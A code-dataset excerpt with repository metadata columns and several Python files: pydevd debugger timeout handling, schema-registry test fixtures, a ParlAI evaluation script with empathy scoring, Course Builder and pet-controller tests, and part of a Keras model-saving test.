hexsha
stringlengths 40
40
| size
int64 1
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
239
| max_stars_repo_name
stringlengths 5
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
239
| max_issues_repo_name
stringlengths 5
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
239
| max_forks_repo_name
stringlengths 5
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 1
1.03M
| avg_line_length
float64 1
958k
| max_line_length
int64 1
1.03M
| alphanum_fraction
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4a18cafc2cc5f5c78a0ca6d78cbd2dcfbb268d80
| 8,366
|
py
|
Python
|
Lib/site-packages/debugpy/_vendored/pydevd/_pydevd_bundle/pydevd_timeout.py
|
edupyter/EDUPYTER38
|
396183cea72987506f1ef647c0272a2577c56218
|
[
"bzip2-1.0.6"
] | null | null | null |
Lib/site-packages/debugpy/_vendored/pydevd/_pydevd_bundle/pydevd_timeout.py
|
edupyter/EDUPYTER38
|
396183cea72987506f1ef647c0272a2577c56218
|
[
"bzip2-1.0.6"
] | null | null | null |
Lib/site-packages/debugpy/_vendored/pydevd/_pydevd_bundle/pydevd_timeout.py
|
edupyter/EDUPYTER38
|
396183cea72987506f1ef647c0272a2577c56218
|
[
"bzip2-1.0.6"
] | null | null | null |
from _pydev_bundle._pydev_saved_modules import threading
from _pydevd_bundle.pydevd_daemon_thread import PyDBDaemonThread
from _pydevd_bundle.pydevd_constants import thread_get_ident, IS_CPYTHON, NULL
import ctypes
import time
from _pydev_bundle import pydev_log
import weakref
from _pydevd_bundle.pydevd_utils import is_current_thread_main_thread
from _pydevd_bundle import pydevd_utils
_DEBUG = False # Default should be False as this can be very verbose.
class _TimeoutThread(PyDBDaemonThread):
'''
The idea in this class is that it should be usually stopped waiting
for the next event to be called (paused in a threading.Event.wait).
When a new handle is added it sets the event so that it processes the handles and
then keeps on waiting as needed again.
This is done so that it's a bit more optimized than creating many Timer threads.
'''
def __init__(self, py_db):
PyDBDaemonThread.__init__(self, py_db)
self._event = threading.Event()
self._handles = []
# We could probably do things valid without this lock so that it's possible to add
# handles while processing, but the implementation would also be harder to follow,
# so, for now, we're either processing or adding handles, not both at the same time.
self._lock = threading.Lock()
def _on_run(self):
wait_time = None
while not self._kill_received:
if _DEBUG:
if wait_time is None:
pydev_log.critical('pydevd_timeout: Wait until a new handle is added.')
else:
pydev_log.critical('pydevd_timeout: Next wait time: %s.', wait_time)
self._event.wait(wait_time)
if self._kill_received:
self._handles = []
return
wait_time = self.process_handles()
def process_handles(self):
'''
:return int:
Returns the time we should be waiting for to process the next event properly.
'''
with self._lock:
if _DEBUG:
pydev_log.critical('pydevd_timeout: Processing handles')
self._event.clear()
handles = self._handles
new_handles = self._handles = []
# Do all the processing based on this time (we want to consider snapshots
# of processing time -- anything not processed now may be processed at the
# next snapshot).
curtime = time.time()
min_handle_timeout = None
for handle in handles:
if curtime < handle.abs_timeout and not handle.disposed:
# It still didn't time out.
if _DEBUG:
pydev_log.critical('pydevd_timeout: Handle NOT processed: %s', handle)
new_handles.append(handle)
if min_handle_timeout is None:
min_handle_timeout = handle.abs_timeout
elif handle.abs_timeout < min_handle_timeout:
min_handle_timeout = handle.abs_timeout
else:
if _DEBUG:
pydev_log.critical('pydevd_timeout: Handle processed: %s', handle)
# Timed out (or disposed), so, let's execute it (should be no-op if disposed).
handle.exec_on_timeout()
if min_handle_timeout is None:
return None
else:
timeout = min_handle_timeout - curtime
if timeout <= 0:
pydev_log.critical('pydevd_timeout: Expected timeout to be > 0. Found: %s', timeout)
return timeout
def do_kill_pydev_thread(self):
PyDBDaemonThread.do_kill_pydev_thread(self)
with self._lock:
self._event.set()
def add_on_timeout_handle(self, handle):
with self._lock:
self._handles.append(handle)
self._event.set()
class _OnTimeoutHandle(object):
def __init__(self, tracker, abs_timeout, on_timeout, kwargs):
self._str = '_OnTimeoutHandle(%s)' % (on_timeout,)
self._tracker = weakref.ref(tracker)
self.abs_timeout = abs_timeout
self.on_timeout = on_timeout
if kwargs is None:
kwargs = {}
self.kwargs = kwargs
self.disposed = False
def exec_on_timeout(self):
# Note: lock should already be obtained when executing this function.
kwargs = self.kwargs
on_timeout = self.on_timeout
if not self.disposed:
self.disposed = True
self.kwargs = None
self.on_timeout = None
try:
if _DEBUG:
pydev_log.critical('pydevd_timeout: Calling on timeout: %s with kwargs: %s', on_timeout, kwargs)
on_timeout(**kwargs)
except Exception:
pydev_log.exception('pydevd_timeout: Exception on callback timeout.')
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
tracker = self._tracker()
if tracker is None:
lock = NULL
else:
lock = tracker._lock
with lock:
self.disposed = True
self.kwargs = None
self.on_timeout = None
def __str__(self):
return self._str
__repr__ = __str__
class TimeoutTracker(object):
'''
This is a helper class to track the timeout of something.
'''
def __init__(self, py_db):
self._thread = None
self._lock = threading.Lock()
self._py_db = weakref.ref(py_db)
def call_on_timeout(self, timeout, on_timeout, kwargs=None):
'''
This can be called regularly to always execute the given function after a given timeout:
call_on_timeout(py_db, 10, on_timeout)
Or as a context manager to stop the method from being called if it finishes before the timeout
elapses:
with call_on_timeout(py_db, 10, on_timeout):
...
Note: the callback will be called from a PyDBDaemonThread.
'''
with self._lock:
if self._thread is None:
if _DEBUG:
pydev_log.critical('pydevd_timeout: Created _TimeoutThread.')
self._thread = _TimeoutThread(self._py_db())
self._thread.start()
curtime = time.time()
handle = _OnTimeoutHandle(self, curtime + timeout, on_timeout, kwargs)
if _DEBUG:
pydev_log.critical('pydevd_timeout: Added handle: %s.', handle)
self._thread.add_on_timeout_handle(handle)
return handle
def create_interrupt_this_thread_callback():
'''
The idea here is returning a callback that when called will generate a KeyboardInterrupt
in the thread that called this function.
If this is the main thread, this means that it'll emulate a Ctrl+C (which may stop I/O
and sleep operations).
For other threads, this will call PyThreadState_SetAsyncExc to raise
a KeyboardInterrupt before the next instruction (so, it won't really interrupt I/O or
sleep operations).
:return callable:
Returns a callback that will interrupt the current thread (this may be called
from an auxiliary thread).
'''
tid = thread_get_ident()
if is_current_thread_main_thread():
main_thread = threading.current_thread()
def raise_on_this_thread():
pydev_log.debug('Callback to interrupt main thread.')
pydevd_utils.interrupt_main_thread(main_thread)
else:
# Note: this works in the sense that it can stop some cpu-intensive slow operation,
# but we can't really interrupt the thread out of some sleep or I/O operation
# (this will only be raised when Python is about to execute the next instruction).
def raise_on_this_thread():
if IS_CPYTHON:
pydev_log.debug('Interrupt thread: %s', tid)
ctypes.pythonapi.PyThreadState_SetAsyncExc(ctypes.c_long(tid), ctypes.py_object(KeyboardInterrupt))
else:
pydev_log.debug('It is only possible to interrupt non-main threads in CPython.')
return raise_on_this_thread
| 34.858333
| 116
| 0.619412
|
4a18cb35fb73cc714307c4e53c5a1ddc24c992d8
| 3,346
|
py
|
Python
|
tests/conftest.py
|
Naillik1/python-schema-registry-client
|
2a69fe619cb2409eed1ac82d79048c0f68818b29
|
[
"MIT"
] | null | null | null |
tests/conftest.py
|
Naillik1/python-schema-registry-client
|
2a69fe619cb2409eed1ac82d79048c0f68818b29
|
[
"MIT"
] | null | null | null |
tests/conftest.py
|
Naillik1/python-schema-registry-client
|
2a69fe619cb2409eed1ac82d79048c0f68818b29
|
[
"MIT"
] | null | null | null |
import logging
import os
import pytest
from schema_registry.client import SchemaRegistryClient, errors, schema
from schema_registry.serializers import MessageSerializer
logger = logging.getLogger(__name__)
CERTIFICATES_DIR = os.path.join(os.path.dirname(os.path.realpath(__file__)), "certificates")
flat_schemas = {
"deployment_schema": {
"type": "record",
"namespace": "com.kubertenes",
"name": "AvroDeployment",
"fields": [
{"name": "image", "type": "string"},
{"name": "replicas", "type": "int"},
{"name": "port", "type": "int"},
],
},
"country_schema": {
"type": "record",
"namespace": "com.example",
"name": "AvroSomeSchema",
"fields": [{"name": "country", "type": "string"}],
},
"user_schema_v3": {
"type": "record",
"name": "User",
"aliases": ["UserKey"],
"fields": [
{"name": "name", "type": "string"},
{"name": "favorite_number", "type": ["int", "null"], "default": 42},
{"name": "favorite_color", "type": ["string", "null"], "default": "purple"},
{"name": "country", "type": ["null", "string"], "default": None},
],
},
}
class Response:
def __init__(self, status_code, content=None):
self.status_code = status_code
if content is None:
content = {}
self.content = content
def json(self):
return self.content
@pytest.fixture
def response_klass():
return Response
@pytest.fixture
def client():
url = os.getenv("SCHEMA_REGISTRY_URL", "http://schema-registry-server:8081")
client = SchemaRegistryClient(url)
yield client
subjects = {
"test-basic-schema",
"test-deployment",
"test-country",
"test-basic-schema-backup",
"test-advance-schema",
"test-user-schema",
"subject-does-not-exist",
"test-logical-types-schema",
"test-schema-version",
"test-nested-schema",
}
# Executing the clean up. Delete all the subjects between tests.
for subject in subjects:
try:
client.delete_subject(subject)
except errors.ClientError as exc:
logger.info(exc.message)
@pytest.fixture
def schemas():
return flat_schemas
@pytest.fixture
def deployment_schema():
return schema.AvroSchema(flat_schemas.get("deployment_schema"))
@pytest.fixture
def country_schema():
return schema.AvroSchema(flat_schemas.get("country_schema"))
@pytest.fixture
def user_schema_v3():
"""
The user V2 is:
{
"type": "record",
"name": "User",
"aliases": ["UserKey"],
"fields": [
{"name": "name", "type": "string"},
{"name": "favorite_number", "type": ["int", "null"], "default": 42},
{"name": "favorite_color", "type": ["string", "null"], "default": "purple"}
]
}
"""
return schema.AvroSchema(flat_schemas.get("user_schema_v3"))
@pytest.fixture
def message_serializer(client):
return MessageSerializer(client)
@pytest.fixture
def certificates():
return {
"certificate": os.path.join(CERTIFICATES_DIR, "cert.pem"),
"key": os.path.join(CERTIFICATES_DIR, "key.pem"),
"password": "test",
}
| 24.970149
| 92
| 0.578004
|
4a18cbceab7a27d7162f3e6e668d6fd67c2ef7e3
| 10,861
|
py
|
Python
|
from_parlai/eval_model.py
|
skywalker023/focused-empathy
|
04bdd0cf2fcd7bb4ee204cacb54ce970f426c916
|
[
"MIT"
] | 29
|
2021-09-07T06:54:23.000Z
|
2022-03-25T12:33:04.000Z
|
from_parlai/eval_model.py
|
skywalker023/focused-empathy
|
04bdd0cf2fcd7bb4ee204cacb54ce970f426c916
|
[
"MIT"
] | 8
|
2021-09-25T05:39:40.000Z
|
2022-03-29T07:04:08.000Z
|
from_parlai/eval_model.py
|
skywalker023/focused-empathy
|
04bdd0cf2fcd7bb4ee204cacb54ce970f426c916
|
[
"MIT"
] | 2
|
2021-11-07T08:27:38.000Z
|
2022-01-09T05:28:41.000Z
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""
Basic example which iterates through the tasks specified and evaluates the given model
on them.
## Examples
```shell
parlai eval_model -t "babi:Task1k:2" -m "repeat_label"
parlai eval_model -t "#CornellMovie" -m "ir_baseline" -mp "-lp 0.5"
```
"""
from parlai.core.params import ParlaiParser, print_announcements
from parlai.core.agents import create_agent
from parlai.core.logs import TensorboardLogger
from parlai.core.metrics import (
aggregate_named_reports,
aggregate_unnamed_reports,
Metric,
)
from parlai.core.worlds import create_task
from parlai.utils.misc import TimeLogger, nice_report
from parlai.utils.world_logging import WorldLogger
from parlai.core.script import ParlaiScript, register_script
from parlai.utils.io import PathManager
import parlai.utils.logging as logging
from parlai.core.metrics import AverageMetric
import os
import json
import random
from tqdm import tqdm
from copy import deepcopy
import torch
from parlai.utils.distributed import (
is_primary_worker,
all_gather_list,
is_distributed,
get_rank,
)
from modules.empathy_scorer import EmpathyScorer
from zoo.blender.build import download as download_blender
def setup_args(parser=None):
if parser is None:
parser = ParlaiParser(True, True, 'Evaluate a model')
# Get command line arguments
parser.add_argument(
'-rf',
'--report-filename',
type=str,
default='',
help='Saves a json file of the evaluation report either as an '
'extension to the model-file (if begins with a ".") or a whole '
'file path. Set to the empty string to not save at all.',
)
parser.add_argument(
'--save-world-logs',
type='bool',
default=False,
help='Saves a jsonl file containing all of the task examples and '
'model replies. Must also specify --report-filename.',
)
parser.add_argument(
'--save-format',
type=str,
default='conversations',
choices=['conversations', 'parlai'],
)
parser.add_argument('-ne', '--num-examples', type=int, default=-1)
parser.add_argument('-d', '--display-examples', type='bool', default=False)
parser.add_argument(
'--display-add-fields',
type=str,
default='full_text',
help='Specify extra fields for display'
)
parser.add_argument('-ltim', '--log-every-n-secs', type=float, default=10)
parser.add_argument(
'-mcs',
'--metrics',
type=str,
default='default',
help='list of metrics to show/compute, e.g. all, default,'
'or give a list split by , like '
'ppl,f1,accuracy,hits@1,rouge,bleu'
'the rouge metrics will be computed as rouge-1, rouge-2 and rouge-l',
)
parser.add_argument(
'-micro',
'--aggregate-micro',
type='bool',
default=False,
help='Report micro-averaged metrics instead of macro averaged metrics.',
recommended=False,
)
parser.add_argument(
'--empathy-score',
type='bool',
default=False,
help="Compute empathy identification score if true (please see the paper {A Computational Approach to Understanding Empathy Expressed in Text-Based Mental Health Support} for more details)",
)
WorldLogger.add_cmdline_args(parser)
TensorboardLogger.add_cmdline_args(parser)
parser.set_params(datatype='test')
return parser
def _save_eval_stats(opt, report):
if not is_primary_worker:
return
report_fname = opt['report_filename']
if report_fname == '':
return
json_serializable_report = report
for k, v in report.items():
if isinstance(v, Metric):
v = v.value()
json_serializable_report[k] = v
# Save report
with PathManager.open(report_fname, 'w') as f:
logging.info(f'Saving model report to {report_fname}')
json.dump({'opt': opt, 'report': json_serializable_report}, f, indent=4)
f.write("\n") # for jq
def _eval_single_world(
opt, agent, task,
epitome_empathy_scorer: EmpathyScorer =None,
):
logging.info(f'Evaluating task {task} using datatype {opt.get("datatype")}.')
# set up world logger
world_logger = WorldLogger(opt) if opt['save_world_logs'] else None
task_opt = opt.copy() # copy opt since we're editing the task
task_opt['task'] = task
world = create_task(task_opt, agent) # create worlds for tasks
# set up logging
log_every_n_secs = opt.get('log_every_n_secs', -1)
if log_every_n_secs <= 0:
log_every_n_secs = float('inf')
log_time = TimeLogger()
# max number of examples to evaluate
max_cnt = opt['num_examples'] if opt['num_examples'] > 0 else float('inf')
pbar_desc = "Generation"
if max_cnt == float('inf'):
try:
pbar = tqdm(total=world.worlds[0].agents[0].num_examples(), desc=pbar_desc)
except AttributeError as e:
pbar = tqdm(total=world.agents[0].num_examples(), desc=pbar_desc)
else:
pbar = tqdm(total=max_cnt, desc=pbar_desc)
cnt = 0
total_cnt = world.num_examples()
dump_dir = os.path.dirname(opt['report_filename'])
if dump_dir != '':
os.makedirs(dump_dir, exist_ok=True)
report_filename = opt['report_filename'].split('/')[-1]
if opt.get('num_generation_split', 1) > 1:
current_split = opt['current_split']
dump_fname = os.path.join(
dump_dir, f'{report_filename}_dump_split{current_split}.jsonl')
else:
dump_fname = os.path.join(dump_dir, f'{report_filename}_dump.jsonl')
dump_fp = open(dump_fname, 'w')
if is_distributed():
logging.warn('Progress bar is approximate in distributed mode.')
if epitome_empathy_scorer:
IP_scores = []
EX_scores = []
while not world.epoch_done() and cnt < max_cnt:
cnt += opt.get('batchsize', 1)
world.parley()
if world_logger is not None:
world_logger.log(world)
if opt['display_examples'] and cnt % (50 * opt.get('batchsize')) == 0:
# display examples
print(world.display() + '\n~~')
if log_time.time() > log_every_n_secs:
report = world.report()
text, report = log_time.log(
report.get('exs', 0), min(max_cnt, total_cnt), report
)
logging.info(text)
pbar.update(cnt - pbar.n)
# Prepare input for computing empathy score
if epitome_empathy_scorer:
seeker_posts = []
response_posts = []
for w in world.worlds:
teacher_act = w.acts[0]
agent_act = w.acts[1]
seeker_post = teacher_act.get('text', None)
response_post = agent_act.get('text', None)
if seeker_post is None or response_post is None:
continue
seeker_posts.append(seeker_post)
response_posts.append(response_post)
# Compute empathy score
if epitome_empathy_scorer and len(seeker_posts) > 0:
empathy_scores = epitome_empathy_scorer(seeker_posts, response_posts)
IP_scores += empathy_scores['IP'][0]
EX_scores += empathy_scores['EX'][0]
for w in world.worlds:
teacher_act = w.acts[0]
agent_act = deepcopy(w.acts[1])
try:
for key in agent_act['metrics'].keys():
agent_act['metrics'][key] = agent_act['metrics'][key].value()
except KeyError as e:
# Invalid batch
continue
all_acts = {'teacher': teacher_act, 'agent': agent_act}
if dump_dir != '':
dump_fp.write(json.dumps(all_acts) + '\n')
dump_fp.flush()
pbar.close()
if dump_dir != '':
dump_fp.close()
if world_logger is not None:
# dump world acts to file
world_logger.reset() # add final acts to logs
base_outfile = opt['report_filename']
if is_distributed():
rank = get_rank()
outfile = base_outfile + f'_{task}_{rank}_replies.jsonl'
else:
outfile = base_outfile + f'_{task}_replies.jsonl'
world_logger.write(outfile, world, file_format=opt['save_format'])
_report = world.report()
if epitome_empathy_scorer:
_report['empathy_epitome_IP'] = AverageMetric(sum(IP_scores), len(IP_scores))
_report['empathy_epitome_EX'] = AverageMetric(sum(EX_scores), len(EX_scores))
report = aggregate_unnamed_reports(all_gather_list(_report))
world.reset()
return report
def eval_model(opt):
"""
Evaluates a model.
:param opt: tells the evaluation function how to run
:return: the final result of calling report()
"""
device = list(range(torch.cuda.device_count()))[-1]
random.seed(42)
if 'train' in opt['datatype'] and 'evalmode' not in opt['datatype']:
raise ValueError(
'You should use --datatype train:evalmode if you want to evaluate on '
'the training set.'
)
if opt['save_world_logs'] and not opt['report_filename']:
raise RuntimeError(
'In order to save model replies, please specify the save path '
'with --report-filename'
)
epitome_empathy_scorer = None
if opt['empathy_score']:
epitome_empathy_scorer = EmpathyScorer(opt, batch_size=1, cuda_device=device)
if 'Blender' in opt['model']:
download_blender(opt['datapath'])
# load model and possibly print opt
agent = create_agent(opt, requireModelExists=True)
agent.opt.log()
tasks = opt['task'].split(',')
reports = []
for task in tasks:
task_report = _eval_single_world(opt, agent, task,
epitome_empathy_scorer)
reports.append(task_report)
report = aggregate_named_reports(
dict(zip(tasks, reports)), micro_average=opt.get('aggregate_micro', False)
)
# print announcments and report
print_announcements(opt)
logging.info(
f'Finished evaluating tasks {tasks} using datatype {opt.get("datatype")}'
)
print(nice_report(report))
_save_eval_stats(opt, report)
return report
@register_script('eval_model', aliases=['em', 'eval'])
class EvalModel(ParlaiScript):
@classmethod
def setup_args(cls):
return setup_args()
def run(self):
return eval_model(self.opt)
if __name__ == '__main__':
EvalModel.main()
| 32.713855
| 198
| 0.631065
|
4a18cbe12916f40f4a6339f4a56718d7af9fc872
| 3,124
|
py
|
Python
|
tests/functional_tests.py
|
google/coursebuilder-hello-world-module
|
4429cc9a53c8edd5745d9e9535cf4d8b8c126f40
|
[
"Apache-2.0"
] | 7
|
2016-02-11T19:39:31.000Z
|
2021-04-20T20:38:14.000Z
|
tests/functional_tests.py
|
google/coursebuilder-hello-world-module
|
4429cc9a53c8edd5745d9e9535cf4d8b8c126f40
|
[
"Apache-2.0"
] | 2
|
2015-04-16T22:37:15.000Z
|
2015-04-17T21:27:04.000Z
|
tests/functional_tests.py
|
google/coursebuilder-hello-world-module
|
4429cc9a53c8edd5745d9e9535cf4d8b8c126f40
|
[
"Apache-2.0"
] | 7
|
2017-07-25T21:33:39.000Z
|
2021-10-12T02:35:14.000Z
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Functional tests for the Course Builder Hello World module.
These tests provide examples of how to test global and namespaced handlers, as
well as authenticated and unauthenticated users.
"""
from modules.hello import hello
from tests.functional import actions
class _TestBase(actions.TestBase):
def setUp(self):
super(_TestBase, self).setUp()
self.user_email = 'test@example.com'
def assert_course_title_in(self, course_title, response):
self.assertIn('Welcome to ' + course_title, response.body)
def assert_authenticated_response_looks_correct(
self, response, course_title=None):
self.assertEqual(200, response.status_code)
self.assertIn(self.user_email, response.body)
self.assertIn('Sign out', response.body)
if course_title:
self.assert_course_title_in(course_title, response)
def assert_unauthenticated_response_looks_correct(
self, response, course_title=None):
self.assertEqual(200, response.status_code)
self.assertIn('Please sign in', response.body)
if course_title:
self.assert_course_title_in(course_title, response)
class GlobalHandlerTest(_TestBase):
def test_authenticated_response_looks_correct(self):
actions.login(self.user_email)
self.assert_authenticated_response_looks_correct(
self.testapp.get(hello.GlobalHandler.URL))
def test_unauthenticated_response_looks_correct(self):
self.assert_unauthenticated_response_looks_correct(
self.testapp.get(hello.GlobalHandler.URL))
class NamespacedHandlerTest(_TestBase):
def setUp(self):
super(NamespacedHandlerTest, self).setUp()
self.admin_email = 'admin@example.com'
self.course_name = 'test_course'
self.course_title = 'Test Course'
self.namespaced_url = '/%s%s' % (
self.course_name, hello.NamespacedHandler.URL)
actions.simple_add_course(
self.course_name, self.admin_email, self.course_title)
def test_authenticated_response_looks_correct(self):
actions.login(self.user_email)
self.assert_authenticated_response_looks_correct(
self.testapp.get(self.namespaced_url),
course_title=self.course_title)
def test_unauthenticated_response_looks_correct(self):
self.assert_unauthenticated_response_looks_correct(
self.testapp.get(self.namespaced_url),
course_title=self.course_title)
| 35.101124
| 78
| 0.723752
|
4a18cc141c2c6f8bab7febc2e7a632954d716e7b
| 3,718
|
py
|
Python
|
{{cookiecutter.repo_name}}/{{cookiecutter.project_name}}/tests/controllers/test_pet.py
|
srikiran1/cookiecutter-connexion-microcosm-service
|
da1dea38e08379e8415202b6aed23f79d2d9d24d
|
[
"MIT"
] | 2
|
2019-12-10T03:08:09.000Z
|
2019-12-10T03:08:11.000Z
|
{{cookiecutter.repo_name}}/{{cookiecutter.project_name}}/tests/controllers/test_pet.py
|
srikiran1/cookiecutter-connexion-microcosm-service
|
da1dea38e08379e8415202b6aed23f79d2d9d24d
|
[
"MIT"
] | null | null | null |
{{cookiecutter.repo_name}}/{{cookiecutter.project_name}}/tests/controllers/test_pet.py
|
srikiran1/cookiecutter-connexion-microcosm-service
|
da1dea38e08379e8415202b6aed23f79d2d9d24d
|
[
"MIT"
] | 1
|
2019-12-10T03:08:03.000Z
|
2019-12-10T03:08:03.000Z
|
from hamcrest import assert_that, is_, equal_to, calling, raises
from mock import Mock, patch
from werkzeug.exceptions import NotFound
from {{ cookiecutter.project_name }}.controllers.pet import PetController
class TestPetController(object):
def setup(self):
self.graph = Mock()
self.controller = PetController(self.graph)
@patch("{{ cookiecutter.project_name }}.controllers.pet.Pet.to_list_dict")
def test_find_pets(self, mock_to_list_dict):
tags = ["a", "b"]
limit = 10
offset = 0
order_by = "created"
direction = "ASCENDING"
total_count = 100
self.controller.store.count.return_value = total_count
assert_that(self.controller.find_pets(tags, limit, offset, order_by, direction),
is_(equal_to((mock_to_list_dict.return_value, 200))))
mock_to_list_dict.assert_called_once_with(items=self.controller.store.find.return_value,
total_count=total_count,
limit=limit,
offset=offset,
order_by=order_by,
direction=direction)
self.controller.store.find.assert_called_once_with(tags=tags,
limit=limit,
offset=offset,
order_by=order_by,
direction=direction)
self.controller.store.count.assert_called_once_with(tags=tags)
def test_find_pets_with_offset_beyond_total_count(self):
tags = ["a", "b"]
limit = 10
order_by = "created"
direction = "ASCENDING"
total_count = 100
offset = total_count + 1
self.controller.store.count.return_value = total_count
assert_that(calling(self.controller.find_pets).with_args(tags, limit, offset, order_by, direction),
raises(ValueError))
@patch("{{ cookiecutter.project_name }}.controllers.pet.Pet.from_dict")
def test_add_pet(self, mock_from_dict):
pet = Mock()
assert_that(self.controller.add_pet(pet),
is_(equal_to((self.controller.store.create.return_value.to_dict.return_value, 201))))
self.controller.store.create.assert_called_once_with(mock_from_dict.return_value)
self.controller.store.create.return_value.to_dict.assert_called_once_with()
mock_from_dict.assert_called_once_with(pet, create=True)
def test_find_pet_by_id(self):
id_ = "some_id"
assert_that(self.controller.find_pet_by_id(id_=id_),
is_(equal_to((self.controller.store.retrieve.return_value.to_dict.return_value, 200))))
self.controller.store.retrieve.assert_called_once_with(identifier=id_)
self.controller.store.retrieve.return_value.to_dict.assert_called_once_with()
def test_delete_pet(self):
id_ = "some_id"
assert_that(self.controller.delete_pet(id_=id_), is_(equal_to((None, 204))))
self.controller.store.retrieve.assert_called_once_with(identifier=id_)
self.controller.store.delete.assert_called_once_with(identifier=id_)
def test_delete_pet_not_existing(self):
id_ = "some_id"
self.controller.store.retrieve.return_value = None
assert_that(calling(self.controller.delete_pet).with_args(id_=id_), raises(NotFound))
self.controller.store.retrieve.assert_called_once_with(identifier=id_)
| 41.775281
| 107
| 0.61646
|
4a18cc2e119d7cfb3f15da593d4944abd445905b
| 15,944
|
py
|
Python
|
tensorflow/python/keras/_impl/keras/engine/saving_test.py
|
Pravo21/tensorflow
|
10be1f2377bf7aad1a4cfa306277c53e44493a57
|
[
"Apache-2.0"
] | 13
|
2018-07-23T18:53:35.000Z
|
2021-11-18T19:56:45.000Z
|
tensorflow/python/keras/_impl/keras/engine/saving_test.py
|
sysufuchao/tensorflow
|
10be1f2377bf7aad1a4cfa306277c53e44493a57
|
[
"Apache-2.0"
] | null | null | null |
tensorflow/python/keras/_impl/keras/engine/saving_test.py
|
sysufuchao/tensorflow
|
10be1f2377bf7aad1a4cfa306277c53e44493a57
|
[
"Apache-2.0"
] | 13
|
2018-09-07T13:28:38.000Z
|
2020-07-17T15:06:24.000Z
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#,============================================================================
"""Tests for model saving."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import shutil
import tempfile
import numpy as np
from tensorflow.python.keras._impl import keras
from tensorflow.python.platform import test
from tensorflow.python.training import training as training_module
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
class TestWeightSavingAndLoading(test.TestCase):
def test_weight_loading(self):
with self.test_session():
a = keras.layers.Input(shape=(2,))
x = keras.layers.Dense(3)(a)
b = keras.layers.Dense(1)(x)
model = keras.models.Model(a, b)
x = np.random.random((3, 2))
ref_y = model.predict(x)
weights = model.get_weights()
model.set_weights(weights)
y = model.predict(x)
self.assertAllClose(ref_y, y)
with self.assertRaises(ValueError):
model.set_weights(weights[1:])
with self.assertRaises(ValueError):
model.set_weights(weights[::-1])
if h5py is None:
return # Skip rest of test if H5py isn't available.
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir)
h5_path = os.path.join(temp_dir, 'test.h5')
model.save_weights(h5_path)
model.load_weights(h5_path)
y = model.predict(x)
self.assertAllClose(ref_y, y)
model.load_weights(h5_path, by_name=True)
y = model.predict(x)
self.assertAllClose(ref_y, y)
def test_weight_preprocessing(self):
input_dim = 3
output_dim = 3
size = 2
cases = [
[
(keras.layers.Bidirectional(keras.layers.SimpleRNN(2))),
[np.random.random((2, 1)), np.random.random((2, 1))],
(None, 3, 2),
],
[
(keras.layers.TimeDistributed(keras.layers.Dense(1))),
[np.random.random((2, 1)), np.random.random((1,))],
(None, 3, 2),
],
[
(keras.layers.Conv1D(output_dim, size, use_bias=False)),
[np.random.random((output_dim, input_dim, size, 1))],
(None, 4, input_dim),
],
[
(keras.layers.Conv2D(output_dim, size,
use_bias=False, data_format='channels_first')),
[np.random.random((output_dim, input_dim, size, size))],
(None, input_dim, 4, 4),
],
[
(keras.layers.Conv2DTranspose(output_dim, size,
use_bias=False,
data_format='channels_first')),
[np.random.random((output_dim, input_dim, size, size))],
(None, input_dim, 4, 4),
],
[
(keras.layers.Conv2DTranspose(output_dim, size,
use_bias=False,
data_format='channels_last')),
[np.random.random((size, size, input_dim, output_dim))],
(None, 4, 4, input_dim),
],
[
(keras.layers.Conv3D(output_dim, size,
use_bias=False, data_format='channels_first')),
[np.random.random((output_dim, input_dim, size, size, size))],
(None, input_dim, 4, 4, 4),
],
[
(keras.layers.GRU(output_dim)),
[np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,)),
np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,)),
np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,))],
(None, 4, input_dim),
],
[
(keras.layers.LSTM(output_dim)),
[np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,)),
np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,)),
np.random.random((input_dim, output_dim)),
np.random.random((output_dim, output_dim)),
np.random.random((output_dim,)),
np.random.random((input_dim, output_dim)),
